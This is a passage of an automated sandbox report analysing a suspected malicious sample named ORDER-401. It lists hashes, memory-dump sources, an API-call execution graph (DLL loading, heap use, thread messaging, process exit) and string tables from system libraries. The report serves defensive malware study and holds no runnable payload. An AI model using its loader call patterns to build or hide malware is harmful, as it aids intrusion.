                                                                    • Opcode Fuzzy Hash: 53e7cfc5dc5f2f701247dec1f1afc9d947000cb5c38e0b88867e78455ad8c84e
                                                                    • Instruction Fuzzy Hash: 42B014753D4340F3501551F44D5475FD75177D3700FD0CC05714510001C7105434D11F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1588420205.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7cb0000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2a0d0468f410eeb38c97153463a92cc308dc3ebc9b1be67258e05e7297de946a
                                                                    • Instruction ID: 56d7cdd40049abc525eccef0f9b882fe1e6aacf3dfa7488c52b300500d1b2ad5
                                                                    • Opcode Fuzzy Hash: 2a0d0468f410eeb38c97153463a92cc308dc3ebc9b1be67258e05e7297de946a
                                                                    • Instruction Fuzzy Hash: 3BC04CB4910259CBCB148F90CD45BDD7F72EB4A321F105085E90A33254CB315DD5CF54
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1588420205.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7cb0000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9a265feb90293781326b5d9aadf45fbc25746a0277a80d7ffe257f07136533ab
                                                                    • Instruction ID: a47cee899990f7e924290fcbfd9e902ef3bd7c55e5bab33b9a600015f4394e7a
                                                                    • Opcode Fuzzy Hash: 9a265feb90293781326b5d9aadf45fbc25746a0277a80d7ffe257f07136533ab
                                                                    • Instruction Fuzzy Hash: B3C1BCB17007058FDB25EB75C890BAE77FAAF89700F14446DE24A8B291DF35E906CB51
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1573570933.0000000002A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A70000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2a70000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 49264aea51d99913e210bc3fdb9b92cb1759396805d96facd758dbd4bea7295f
                                                                    • Instruction ID: 69f70ae45967e5bc49fe8247fb73cee2ccd0baa1c934426498707fbd054bc7df
                                                                    • Opcode Fuzzy Hash: 49264aea51d99913e210bc3fdb9b92cb1759396805d96facd758dbd4bea7295f
                                                                    • Instruction Fuzzy Hash: F7A15C32E10205CFCF15DFA4CA805AEBBB2FF85304B1545AAE905AB261DF31E956CF54

                                                                    Execution Graph

                                                                    Execution Coverage: 1.2%
                                                                    Dynamic/Decrypted Code Coverage: 5%
                                                                    Signature Coverage: 8.6%
                                                                    Total number of Nodes: 139
                                                                    Total number of Limit Nodes: 12
                                                                    execution_graph 91249 42fa63 91250 42fa73 91249->91250 91251 42fa79 91249->91251 91254 42eaa3 91251->91254 91253 42fa9f 91257 42cc63 91254->91257 91256 42eabb 91256->91253 91258 42cc7d 91257->91258 91259 42cc8b RtlAllocateHeap 91258->91259 91259->91256 91260 4250a3 91265 4250bc 91260->91265 91261 425149 91262 425104 91268 42e9c3 91262->91268 91265->91261 91265->91262 91266 425144 91265->91266 91267 42e9c3 RtlFreeHeap 91266->91267 91267->91261 91271 42cca3 91268->91271 91270 425114 91272 42ccbd 91271->91272 91273 42cccb RtlFreeHeap 91272->91273 91273->91270 91361 424d13 91362 424d2f 91361->91362 91363 424d57 91362->91363 91364 424d6b 91362->91364 91365 42c953 NtClose 91363->91365 91366 42c953 NtClose 91364->91366 91367 424d60 91365->91367 91368 424d74 91366->91368 91371 42eae3 RtlAllocateHeap 91368->91371 91370 424d7f 91371->91370 91372 42bfb3 91373 42bfcd 91372->91373 91376 1582df0 LdrInitializeThunk 91373->91376 91374 42bff2 91376->91374 91377 41b653 91378 41b697 91377->91378 91379 41b6b8 91378->91379 91380 42c953 NtClose 91378->91380 91380->91379 91381 41a8f3 91382 41a90b 91381->91382 91384 41a962 91381->91384 91382->91384 91385 41e833 91382->91385 91386 41e859 91385->91386 91390 41e94d 91386->91390 91391 42fb93 91386->91391 91388 41e8eb 91389 42c003 LdrInitializeThunk 91388->91389 91388->91390 91389->91390 91390->91384 91392 42fb03 91391->91392 91393 42eaa3 RtlAllocateHeap 91392->91393 91394 42fb60 91392->91394 91395 42fb3d 91393->91395 91394->91388 91396 42e9c3 RtlFreeHeap 91395->91396 91396->91394 91397 4143b3 91398 4143cd 91397->91398 91403 417b63 91398->91403 91400 4143e8 91401 41441c PostThreadMessageW 91400->91401 91402 41442d 91400->91402 91401->91402 91405 417b87 91403->91405 91404 417b8e 91404->91400 91405->91404 91406 417bda 91405->91406 91407 417bca LdrLoadDll 91405->91407 91406->91400 91407->91406 91408 1582b60 LdrInitializeThunk 91409 4190f8 91410 42c953 NtClose 91409->91410 91411 
419102 91410->91411 91274 40192a 91276 40192e 91274->91276 91275 40198b 91276->91275 91279 42ff33 91276->91279 91277 401a50 91277->91277 91282 42e573 91279->91282 91283 42e599 91282->91283 91294 407403 91283->91294 91285 42e5af 91293 42e60b 91285->91293 91297 41b463 91285->91297 91287 42e5e3 91308 428563 91287->91308 91288 42e5ce 91288->91287 91312 42cce3 91288->91312 91291 42e5fd 91292 42cce3 ExitProcess 91291->91292 91292->91293 91293->91277 91315 416823 91294->91315 91296 407410 91296->91285 91298 41b48f 91297->91298 91333 41b353 91298->91333 91301 41b4d4 91303 41b4f0 91301->91303 91306 42c953 NtClose 91301->91306 91302 41b4bc 91304 41b4c7 91302->91304 91339 42c953 91302->91339 91303->91288 91304->91288 91307 41b4e6 91306->91307 91307->91288 91309 4285c5 91308->91309 91311 4285d2 91309->91311 91347 4189c3 91309->91347 91311->91291 91313 42cd00 91312->91313 91314 42cd11 ExitProcess 91313->91314 91314->91287 91316 416840 91315->91316 91318 416853 91316->91318 91319 42d393 91316->91319 91318->91296 91321 42d3ad 91319->91321 91320 42d3dc 91320->91318 91321->91320 91326 42c003 91321->91326 91324 42e9c3 RtlFreeHeap 91325 42d452 91324->91325 91325->91318 91327 42c01d 91326->91327 91330 1582c0a 91327->91330 91328 42c046 91328->91324 91331 1582c1f LdrInitializeThunk 91330->91331 91332 1582c11 91330->91332 91331->91328 91332->91328 91334 41b36d 91333->91334 91338 41b449 91333->91338 91342 42c093 91334->91342 91337 42c953 NtClose 91337->91338 91338->91301 91338->91302 91340 42c96d 91339->91340 91341 42c97b NtClose 91340->91341 91341->91304 91343 42c0b0 91342->91343 91346 15835c0 LdrInitializeThunk 91343->91346 91344 41b43d 91344->91337 91346->91344 91349 4189ed 91347->91349 91348 418edb 91348->91311 91349->91348 91355 414033 91349->91355 91351 418b0e 91351->91348 91352 42e9c3 RtlFreeHeap 91351->91352 91353 418b26 91352->91353 91353->91348 91354 42cce3 ExitProcess 91353->91354 91354->91348 91359 414050 91355->91359 91357 4140ac 91357->91351 91358 4140b6 91358->91351 
91359->91358 91360 41b773 RtlFreeHeap LdrInitializeThunk 91359->91360 91360->91357 91412 413ebc 91413 413e64 91412->91413 91414 413ed0 91412->91414 91417 42cbd3 91413->91417 91418 42cbed 91417->91418 91421 1582c70 LdrInitializeThunk 91418->91421 91419 413e75 91421->91419

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 388 417b63-417b7f 389 417b87-417b8c 388->389 390 417b82 call 42f5a3 388->390 391 417b92-417ba0 call 42fba3 389->391 392 417b8e-417b91 389->392 390->389 395 417bb0-417bc1 call 42e043 391->395 396 417ba2-417bad call 42fe43 391->396 401 417bc3-417bd7 LdrLoadDll 395->401 402 417bda-417bdd 395->402 396->395 401->402
                                                                    APIs
                                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417BD5
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2096474723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_ORDER-401.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Load
                                                                    • String ID:
                                                                    • API String ID: 2234796835-0
                                                                    • Opcode ID: b799f33cdfcceec68cf2461573a55d2e37cccfb65537d172954ac166eadf2d1b
                                                                    • Instruction ID: 122384901a9c5e31b0cbf47cd83ed5cb9323d92cb62f98cf8b450b2778bc3db3
                                                                    • Opcode Fuzzy Hash: b799f33cdfcceec68cf2461573a55d2e37cccfb65537d172954ac166eadf2d1b
                                                                    • Instruction Fuzzy Hash: D60171B1E0420DBBDF10DBE1DC42FDEB3789B14308F4081AAE90897241F639EB588B95

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 414 42c953-42c989 call 404643 call 42db53 NtClose
                                                                    APIs
                                                                    • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C984
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2096474723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_ORDER-401.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Close
                                                                    • String ID:
                                                                    • API String ID: 3535843008-0
                                                                    • Opcode ID: 2f083958855e6b39986ef7b53346a4094405c7a33e0ff299f3daded4b7834c37
                                                                    • Instruction ID: a1a1041c0e6c1b94269db6ff4cf73d3451205fe7691f058a31b8fa4964ffe1e3
                                                                    • Opcode Fuzzy Hash: 2f083958855e6b39986ef7b53346a4094405c7a33e0ff299f3daded4b7834c37
                                                                    • Instruction Fuzzy Hash: 2EE08676300614BBD510FA5ADC01F97775CEFC6714F404419FA4867341D675B91487F4
APIs
Memory Dump Source
• Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
APIs
Memory Dump Source
• Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
APIs
Memory Dump Source
• Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
APIs
Memory Dump Source
• Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0

Control-flow Graph

APIs
• PostThreadMessageW.USER32(UQ63g7r-,00000111,00000000,00000000), ref: 00414427
Strings
Memory Dump Source
• Source File: 00000004.00000002.2096474723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_ORDER-401.jbxd
Yara matches
Similarity
• API ID: MessagePostThread
• String ID: UQ63g7r-$UQ63g7r-
• API String ID: 1836367815-2341035416

Control-flow Graph

APIs
• PostThreadMessageW.USER32(UQ63g7r-,00000111,00000000,00000000), ref: 00414427
Strings
Memory Dump Source
• Source File: 00000004.00000002.2096474723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_ORDER-401.jbxd
Yara matches
Similarity
• API ID: MessagePostThread
• String ID: UQ63g7r-$UQ63g7r-
• API String ID: 1836367815-2341035416

Control-flow Graph

APIs
• PostThreadMessageW.USER32(UQ63g7r-,00000111,00000000,00000000), ref: 00414427
Strings
Memory Dump Source
• Source File: 00000004.00000002.2096474723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_ORDER-401.jbxd
Yara matches
Similarity
• API ID: MessagePostThread
• String ID: UQ63g7r-$UQ63g7r-
• API String ID: 1836367815-2341035416

Control-flow Graph

• Basic blocks 417bca-417d3f; calls LdrLoadDll and sub_42b9b3 (graph image not preserved)
Memory Dump Source
• Source File: 00000004.00000002.2096474723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_ORDER-401.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:

Control-flow Graph

• Basic blocks 417bb8-417d3f; calls LdrLoadDll and sub_42b9b3 (graph image not preserved)
APIs
• LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417BD5
Memory Dump Source
• Source File: 00000004.00000002.2096474723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_ORDER-401.jbxd
Yara matches
Similarity
• API ID: Load
• String ID:
• API String ID: 2234796835-0

Control-flow Graph

• Single basic block 42cc63-42cca1; calls sub_404643, sub_42db53 and RtlAllocateHeap (graph image not preserved)
APIs
• RtlAllocateHeap.NTDLL(?,0041E8EB,?,?,00000000,?,0041E8EB,?,?,?), ref: 0042CC9C
Memory Dump Source
• Source File: 00000004.00000002.2096474723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_ORDER-401.jbxd
Yara matches
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0

Control-flow Graph

• Single basic block 42cca3-42cce1; calls sub_404643, sub_42db53 and RtlFreeHeap (graph image not preserved)
APIs
• RtlFreeHeap.NTDLL(00000000,00000004,00000000,3777EA40,00000007,00000000,00000004,00000000,004173E4,000000F4), ref: 0042CCDC
Memory Dump Source
• Source File: 00000004.00000002.2096474723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_ORDER-401.jbxd
Yara matches
Similarity
• API ID: FreeHeap
• String ID:
• API String ID: 3298025750-0

Control-flow Graph

• Single basic block 42cce3-42cd1f; calls sub_404643, sub_42db53 and ExitProcess (graph image not preserved)
APIs
• ExitProcess.KERNEL32(?,00000000,00000000,?,9A0A6B39,?,?,9A0A6B39), ref: 0042CD1A
Memory Dump Source
• Source File: 00000004.00000002.2096474723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_ORDER-401.jbxd
Yara matches
Similarity
• API ID: ExitProcess
• String ID:
• API String ID: 621844428-0

Control-flow Graph

• Basic blocks 1582c0a-1582c0f, 1582c11-1582c18 and 1582c1f-1582c26; calls LdrInitializeThunk (graph image not preserved)
APIs
Memory Dump Source
• Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
Strings
• This failed because of error %Ix., xrefs: 015F8EF6
• *** Critical Section Timeout (%p) in %ws:%s, xrefs: 015F8E4B
• The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 015F8DD3
• This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 015F8DB5
• a NULL pointer, xrefs: 015F8F90
• If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 015F8DC4
• *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 015F8D8C
• *** An Access Violation occurred in %ws:%s, xrefs: 015F8F3F
• *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 015F8FEF
• *** Resource timeout (%p) in %ws:%s, xrefs: 015F8E02
• *** enter .cxr %p for the context, xrefs: 015F8FBD
• *** enter .exr %p for the exception record, xrefs: 015F8FA1
• *** then kb to get the faulting stack, xrefs: 015F8FCC
• The critical section is owned by thread %p., xrefs: 015F8E69
• write to, xrefs: 015F8F56
• read from, xrefs: 015F8F5D, 015F8F62
• an invalid address, %p, xrefs: 015F8F7F
• This means that the I/O device reported an I/O error. Check your hardware., xrefs: 015F8F26
• *** Inpage error in %ws:%s, xrefs: 015F8EC8
• This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 015F8F34
• *** A stack buffer overrun occurred in %ws:%s, xrefs: 015F8DA3
• The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 015F8E86
• The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 015F8E3F
• <unknown>, xrefs: 015F8D2E, 015F8D81, 015F8E00, 015F8E49, 015F8EC7, 015F8F3E
• The resource is owned exclusively by thread %p, xrefs: 015F8E24
• The resource is owned shared by %d threads, xrefs: 015F8E2E
• Go determine why that thread has not released the critical section., xrefs: 015F8E75
• The instruction at %p tried to %s , xrefs: 015F8F66
• The instruction at %p referenced memory at %p., xrefs: 015F8EE2
• This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 015F8F2D
Memory Dump Source
• Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
Similarity
• API ID:
• String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
• API String ID: 0-108210295
                                                                    • Opcode ID: c26e77e18ed5488f724b42c2eeb2ccdbeedbca893aebf0a94dea836fb5d04c38
                                                                    • Instruction ID: 77b1210ddfec7327f11da73b4e35defbfa46e9b75c3d76405b84a4045eb54ca9
                                                                    • Opcode Fuzzy Hash: c26e77e18ed5488f724b42c2eeb2ccdbeedbca893aebf0a94dea836fb5d04c38
                                                                    • Instruction Fuzzy Hash: 5581EF79A40201BFDB259E598C49E6B7F77FF96B10B45004DF318AF212E3768901CAA2
                                                                    Strings
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                    Strings
                                                                    • Critical section debug info address, xrefs: 015B541F, 015B552E
                                                                    • Thread identifier, xrefs: 015B553A
                                                                    • Critical section address, xrefs: 015B5425, 015B54BC, 015B5534
                                                                    • double initialized or corrupted critical section, xrefs: 015B5508
                                                                    • Critical section address., xrefs: 015B5502
                                                                    • Invalid debug info address of this critical section, xrefs: 015B54B6
                                                                    • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015B54E2
                                                                    • Address of the debug info found in the active list., xrefs: 015B54AE, 015B54FA
                                                                    • undeleted critical section in freed memory, xrefs: 015B542B
                                                                    • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015B540A, 015B5496, 015B5519
                                                                    • Thread is in a state in which it cannot own a critical section, xrefs: 015B5543
                                                                    • 8, xrefs: 015B52E3
                                                                    • corrupted critical section, xrefs: 015B54C2
                                                                    • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015B54CE
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                    Strings
                                                                    • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 015B2602
                                                                    • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 015B2409
                                                                    • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 015B2498
                                                                    • RtlpResolveAssemblyStorageMapEntry, xrefs: 015B261F
                                                                    • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 015B2412
                                                                    • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 015B25EB
                                                                    • @, xrefs: 015B259B
                                                                    • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 015B2506
                                                                    • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 015B22E4
                                                                    • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 015B2624
                                                                    • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 015B24C0
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                    Strings
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                    Strings
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                    Strings
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                    Strings
                                                                    • AVRF: -*- final list of providers -*- , xrefs: 015C8B8F
                                                                    • HandleTraces, xrefs: 015C8C8F
                                                                    • VerifierDlls, xrefs: 015C8CBD
                                                                    • VerifierFlags, xrefs: 015C8C50
                                                                    • VerifierDebug, xrefs: 015C8CA5
                                                                    • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 015C8A67
                                                                    • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 015C8A3D
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                    Strings
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                    Strings
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                    Strings
                                                                    • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01599A2A
                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 01599A11, 01599A3A
                                                                    • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01599A01
                                                                    • apphelp.dll, xrefs: 01536496
                                                                    • LdrpInitShimEngine, xrefs: 015999F4, 01599A07, 01599A30
                                                                    • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 015999ED
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                    Strings
                                                                    • SXS: %s() passed the empty activation context, xrefs: 015B2165
                                                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 015B21BF
                                                                    • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 015B2178
                                                                    • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 015B219F
                                                                    • RtlGetAssemblyStorageRoot, xrefs: 015B2160, 015B219A, 015B21BA
                                                                    • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 015B2180
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                    Strings
                                                                    • LdrpInitializeImportRedirection, xrefs: 015B8177, 015B81EB
                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 0157C6C3
                                                                    • LdrpInitializeProcess, xrefs: 0157C6C4
                                                                    • Unable to build import redirection Table, Status = 0x%x, xrefs: 015B81E5
                                                                    • Loading import redirection DLL: '%wZ', xrefs: 015B8170
                                                                    • minkernel\ntdll\ldrredirect.c, xrefs: 015B8181, 015B81F5
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                    APIs
                                                                      • Part of subcall function 01582DF0: LdrInitializeThunk.NTDLL ref: 01582DFA
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01580BA3
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01580BB6
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01580D60
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01580D74
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                    • String ID:
                                                                    Strings
